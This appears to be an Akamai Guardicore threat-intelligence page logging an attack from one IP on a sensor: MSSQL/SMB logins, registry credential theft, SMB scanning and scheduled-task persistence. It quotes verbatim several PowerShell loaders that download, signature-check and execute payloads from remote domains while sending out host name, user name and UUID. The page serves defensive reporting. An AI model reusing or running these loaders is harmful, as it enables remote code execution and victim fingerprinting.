IP Address: 111.254.60.45Previously Malicious
IP Address: 111.254.60.45Previously Malicious
This IP address attempted an attack on a machine in our threat sensors network
Role |
Attacker, Scanner |
Services Targeted |
MSSQL SMB |
Tags |
Execute MsSql Shell Command Service Start Unauthorized Credential Access Successful SMB Login MSSQL SMB Share Connect SMB File Operation By CMD Scheduled Task Creation Successful MSSQL Login PowerShell CMD |
Associated Attack Servers |
- |
IP Address |
111.254.60.45 |
|
Domain |
- |
|
ISP |
HiNet |
|
Country |
Taiwan, Province of China |
|
WHOIS |
Created Date |
- |
Updated Date |
- |
|
Organization |
- |
First seen in Akamai Guardicore Segmentation |
2021-05-24 |
Last seen in Akamai Guardicore Segmentation |
2021-05-24 |
What is Akamai Guardicore SegmentationAkamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More
A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: White List |
Successful MSSQL Login |
A user logged in using SMB with the following username: Administrator - Authentication policy: Reached Max Attempts |
Successful SMB Login |
MSSQL executed 2 shell commands |
Execute MsSql Shell Command |
A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: Previously Approved User 3 times |
Successful MSSQL Login |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.bb3u9.com |
DNS Query Access Suspicious Domain Outgoing Connection |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.186.90:80 |
Outgoing Connection |
The command line blackball was scheduled to run by modifying C:\Windows\System32\Tasks\blackball |
|
The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\Y65I2GFrmR7 |
|
Service msiserver was started |
Service Start |
PowerShell session started by c:\windows\system32\windowspowershell\v1.0\powershell.exe 2 times |
|
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: d.u78wjdu.com |
DNS Query Access Suspicious Domain Outgoing Connection |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.251.24:80, 192.168.0.0:445, 192.168.0.10:445, 192.168.0.11:445, 192.168.0.12:445, 192.168.0.13:445, 192.168.0.14:445, 192.168.0.15:445, 192.168.0.16:445, 192.168.0.17:445, 192.168.0.18:445, 192.168.0.19:445, 192.168.0.1:445, 192.168.0.20:445, 192.168.0.21:445, 192.168.0.22:445, 192.168.0.23:445, 192.168.0.24:445, 192.168.0.25:445, 192.168.0.26:445, 192.168.0.27:445, 192.168.0.28:445, 192.168.0.29:445, 192.168.0.2:445, 192.168.0.30:445, 192.168.0.31:445, 192.168.0.32:445, 192.168.0.33:445, 192.168.0.34:445, 192.168.0.35:445, 192.168.0.36:445, 192.168.0.37:445, 192.168.0.38:445, 192.168.0.39:445, 192.168.0.3:445, 192.168.0.40:445, 192.168.0.41:445, 192.168.0.42:445, 192.168.0.43:445, 192.168.0.44:445, 192.168.0.45:445, 192.168.0.46:445, 192.168.0.47:445, 192.168.0.48:445, 192.168.0.49:445, 192.168.0.4:445, 192.168.0.50:445, 192.168.0.51:445, 192.168.0.52:445, 192.168.0.53:445, 192.168.0.54:445, 192.168.0.55:445, 192.168.0.56:445, 192.168.0.57:445, 192.168.0.58:445, 192.168.0.59:445, 192.168.0.5:445, 192.168.0.60:445, 192.168.0.61:445, 192.168.0.62:445, 192.168.0.63:445, 192.168.0.64:445, 192.168.0.65:445, 192.168.0.66:445, 192.168.0.67:445, 192.168.0.68:445, 192.168.0.69:445, 192.168.0.6:445, 192.168.0.70:445, 192.168.0.71:445, 192.168.0.72:445, 192.168.0.73:445, 192.168.0.74:445, 192.168.0.75:445, 192.168.0.76:445, 192.168.0.77:445, 192.168.0.78:445, 192.168.0.79:445, 192.168.0.7:445, 192.168.0.80:445, 192.168.0.81:445, 192.168.0.82:445, 192.168.0.83:445, 192.168.0.84:445, 192.168.0.85:445, 192.168.0.86:445, 192.168.0.87:445, 192.168.0.8:445, 192.168.0.9:445 and 54.225.222.160:443 |
Outgoing Connection |
The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zke'+'r9.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\C2jb0ZVDuPs\6mnCxpb4 |
|
The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\olBv8pfZ3X\1JvNPpZEKa |
|
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.zz3r0.com |
DNS Query Access Suspicious Domain |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.bb3u9.com |
DNS Query Access Suspicious Domain Outgoing Connection |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.186.90:80 |
Outgoing Connection |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.zker9.com |
DNS Query Access Suspicious Domain |
c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to extract credentials from Windows Registry 69 times |
Unauthorized Credential Access |
Process netsvcs Service Group started listening on ports: 65529 |
Listening |
Process c:\windows\system32\ipconfig.exe attempted to access suspicious domains: d.u78wjdu.com, t.bb3u9.com, t.zker9.com and t.zz3r0.com |
DNS Query Access Suspicious Domain |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access domains: api.ipify.org and ctldl.windowsupdate.com |
DNS Query |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe scanned port 445 on 88 IP Addresses |
Port 445 Scan |
Connection was closed due to timeout |
|